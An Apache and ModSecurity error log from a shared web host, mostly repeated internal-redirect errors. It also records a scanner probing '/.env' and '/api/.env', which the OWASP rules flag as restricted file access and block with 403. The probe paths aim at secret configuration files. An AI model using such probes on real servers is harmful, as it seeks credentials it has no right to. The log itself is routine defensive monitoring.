[Tue May 12 02:22:51.920518 2026] [security2:error] [pid 1709071:tid 1709111] [client 45.148.10.244:57380] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyzLvMumyrWMfSu7qjNQAAANg"]
[Tue May 12 02:22:52.758402 2026] [core:error] [pid 1730207:tid 1730233] [client 20.226.81.141:36097] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:52.758447 2026] [core:error] [pid 1730207:tid 1730233] [client 20.226.81.141:36097] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:52.808155 2026] [security2:error] [pid 1691274:tid 1691279] [client 45.148.10.244:57494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJyzFfdQaraX_prmqcZkQAAAAI"]
[Tue May 12 02:22:54.055577 2026] [core:error] [pid 1691274:tid 1691294] [client 20.226.81.141:47575] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:54.055603 2026] [core:error] [pid 1691274:tid 1691294] [client 20.226.81.141:47575] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:54.842603 2026] [core:error] [pid 1691274:tid 1691299] [client 20.226.81.141:47590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:54.842637 2026] [core:error] [pid 1691274:tid 1691299] [client 20.226.81.141:47590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:55.112543 2026] [security2:error] [pid 1691274:tid 1691280] [client 45.148.10.244:46828] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJy0VfdQaraX_prmqcZmwAAAAM"]
[Tue May 12 02:22:55.150999 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env"] [unique_id "agJy37vMumyrWMfSu7qjVAAAAMk"]
[Tue May 12 02:22:55.151193 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env"] [unique_id "agJy37vMumyrWMfSu7qjVAAAAMk"]
[Tue May 12 02:22:55.242192 2026] [security2:error] [pid 1730207:tid 1730210] [client 43.156.168.214:59034] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agJy3zue9Sp-pIv_Bb6KVAAAAUE"]
[Tue May 12 02:22:56.556359 2026] [core:error] [pid 1695975:tid 1695994] [client 20.226.81.141:47601] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:56.556391 2026] [core:error] [pid 1695975:tid 1695994] [client 20.226.81.141:47601] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:57.554085 2026] [core:error] [pid 1691274:tid 1691286] [client 20.226.81.141:36145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:57.554252 2026] [core:error] [pid 1691274:tid 1691286] [client 20.226.81.141:36145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:57.919966 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJy37vMumyrWMfSu7qjVAAAAMk"]
[Tue May 12 02:22:57.978918 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agJy4bvMumyrWMfSu7qjWAAAAMk"]
[Tue May 12 02:22:57.979109 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agJy4bvMumyrWMfSu7qjWAAAAMk"]
[Tue May 12 02:22:58.164443 2026] [core:error] [pid 1730207:tid 1730216] [client 20.226.81.141:36096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:58.164493 2026] [core:error] [pid 1730207:tid 1730216] [client 20.226.81.141:36096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:59.083983 2026] [core:error] [pid 1709071:tid 1709091] [client 20.226.81.141:36150] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:59.084017 2026] [core:error] [pid 1709071:tid 1709091] [client 20.226.81.141:36150] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:59.817668 2026] [core:error] [pid 1730175:tid 1730190] [client 20.226.81.141:36155] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:22:59.817715 2026] [core:error] [pid 1730175:tid 1730190] [client 20.226.81.141:36155] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:00.018327 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJy4bvMumyrWMfSu7qjWAAAAMk"]
[Tue May 12 02:23:00.077750 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agJy5LvMumyrWMfSu7qjWwAAAMk"]
[Tue May 12 02:23:00.078027 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/api/.env"] [unique_id "agJy5LvMumyrWMfSu7qjWwAAAMk"]
[Tue May 12 02:23:00.630829 2026] [core:error] [pid 1695975:tid 1695985] [client 20.226.81.141:47588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:00.630859 2026] [core:error] [pid 1695975:tid 1695985] [client 20.226.81.141:47588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:01.300366 2026] [core:error] [pid 1695975:tid 1695998] [client 20.226.81.141:36107] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:01.300403 2026] [core:error] [pid 1695975:tid 1695998] [client 20.226.81.141:36107] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:01.726666 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.244:38542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agJy5LvMumyrWMfSu7qjWwAAAMk"]
[Tue May 12 02:23:02.203456 2026] [core:error] [pid 1709071:tid 1709092] [client 20.226.81.141:42152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:02.203483 2026] [core:error] [pid 1709071:tid 1709092] [client 20.226.81.141:42152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:02.983388 2026] [core:error] [pid 1695975:tid 1695996] [client 20.226.81.141:47557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:02.983422 2026] [core:error] [pid 1695975:tid 1695996] [client 20.226.81.141:47557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:04.177866 2026] [core:error] [pid 1709071:tid 1709110] [client 20.226.81.141:47584] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:04.177898 2026] [core:error] [pid 1709071:tid 1709110] [client 20.226.81.141:47584] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:04.665409 2026] [security2:error] [pid 1691274:tid 1691277] [client 43.156.168.214:52758] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agJy6FfdQaraX_prmqcZzwAAAAA"], referer: http://www.letamsgarage.fr
[Tue May 12 02:23:05.115562 2026] [core:error] [pid 1730175:tid 1730188] [client 20.226.81.141:36127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:05.115673 2026] [core:error] [pid 1730175:tid 1730188] [client 20.226.81.141:36127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:05.765687 2026] [core:error] [pid 1691274:tid 1691292] [client 20.226.81.141:36128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:05.765727 2026] [core:error] [pid 1691274:tid 1691292] [client 20.226.81.141:36128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:07.033600 2026] [core:error] [pid 1730207:tid 1730232] [client 20.226.81.141:36147] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:07.033636 2026] [core:error] [pid 1730207:tid 1730232] [client 20.226.81.141:36147] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:08.161271 2026] [core:error] [pid 1695975:tid 1695990] [client 20.226.81.141:35930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:08.161383 2026] [core:error] [pid 1695975:tid 1695990] [client 20.226.81.141:35930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:09.254199 2026] [core:error] [pid 1691274:tid 1691291] [client 20.226.81.141:36122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:09.254251 2026] [core:error] [pid 1691274:tid 1691291] [client 20.226.81.141:36122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:10.355446 2026] [core:error] [pid 1691274:tid 1691288] [client 20.226.81.141:47607] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:10.355484 2026] [core:error] [pid 1691274:tid 1691288] [client 20.226.81.141:47607] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:11.207584 2026] [core:error] [pid 1709071:tid 1709108] [client 20.226.81.141:36138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:11.207761 2026] [core:error] [pid 1709071:tid 1709108] [client 20.226.81.141:36138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:11.297252 2026] [security2:error] [pid 1695975:tid 1695982] [client 43.156.168.214:60414] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agJy79VI9ymHBxup74-HhQAAAIQ"], referer: https://www.letamsgarage.fr/
[Tue May 12 02:23:12.856932 2026] [core:error] [pid 1707624:tid 1707703] [client 20.226.81.141:36116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:12.863094 2026] [core:error] [pid 1707624:tid 1707703] [client 20.226.81.141:36116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:14.302562 2026] [core:error] [pid 1730207:tid 1730212] [client 20.226.81.141:36134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:14.302605 2026] [core:error] [pid 1730207:tid 1730212] [client 20.226.81.141:36134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:15.623157 2026] [core:error] [pid 1695975:tid 1695983] [client 20.226.81.141:36098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:15.623201 2026] [core:error] [pid 1695975:tid 1695983] [client 20.226.81.141:36098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:16.611394 2026] [core:error] [pid 1691274:tid 1691293] [client 20.226.81.141:36106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:16.611437 2026] [core:error] [pid 1691274:tid 1691293] [client 20.226.81.141:36106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:17.174070 2026] [core:error] [pid 1695975:tid 1695994] [client 20.226.81.141:36130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:17.174108 2026] [core:error] [pid 1695975:tid 1695994] [client 20.226.81.141:36130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:19.722686 2026] [core:error] [pid 1730207:tid 1730216] [client 20.226.81.141:35908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:19.722725 2026] [core:error] [pid 1730207:tid 1730216] [client 20.226.81.141:35908] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:21.391654 2026] [core:error] [pid 1707624:tid 1707691] [client 20.226.81.141:42128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:21.391785 2026] [core:error] [pid 1707624:tid 1707691] [client 20.226.81.141:42128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:23.179162 2026] [core:error] [pid 1695975:tid 1695978] [client 20.226.81.141:35913] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:23.179193 2026] [core:error] [pid 1695975:tid 1695978] [client 20.226.81.141:35913] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:24.417637 2026] [core:error] [pid 1707624:tid 1707686] [client 20.226.81.141:47593] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:24.417673 2026] [core:error] [pid 1707624:tid 1707686] [client 20.226.81.141:47593] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:25.304980 2026] [core:error] [pid 1730175:tid 1730197] [client 20.226.81.141:47589] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:25.305151 2026] [core:error] [pid 1730175:tid 1730197] [client 20.226.81.141:47589] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:26.456561 2026] [core:error] [pid 1709071:tid 1709102] [client 20.226.81.141:42127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:26.456597 2026] [core:error] [pid 1709071:tid 1709102] [client 20.226.81.141:42127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:28.031273 2026] [core:error] [pid 1691274:tid 1691281] [client 20.226.81.141:47560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:28.031410 2026] [core:error] [pid 1691274:tid 1691281] [client 20.226.81.141:47560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:29.004244 2026] [core:error] [pid 1730207:tid 1730230] [client 20.226.81.141:47600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:29.004278 2026] [core:error] [pid 1730207:tid 1730230] [client 20.226.81.141:47600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:30.360495 2026] [core:error] [pid 1709071:tid 1709092] [client 20.226.81.141:47608] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:30.360532 2026] [core:error] [pid 1709071:tid 1709092] [client 20.226.81.141:47608] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:23:32.132805 2026] [core:error] [pid 1691274:tid 1691289] [client 20.226.81.141:47583] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
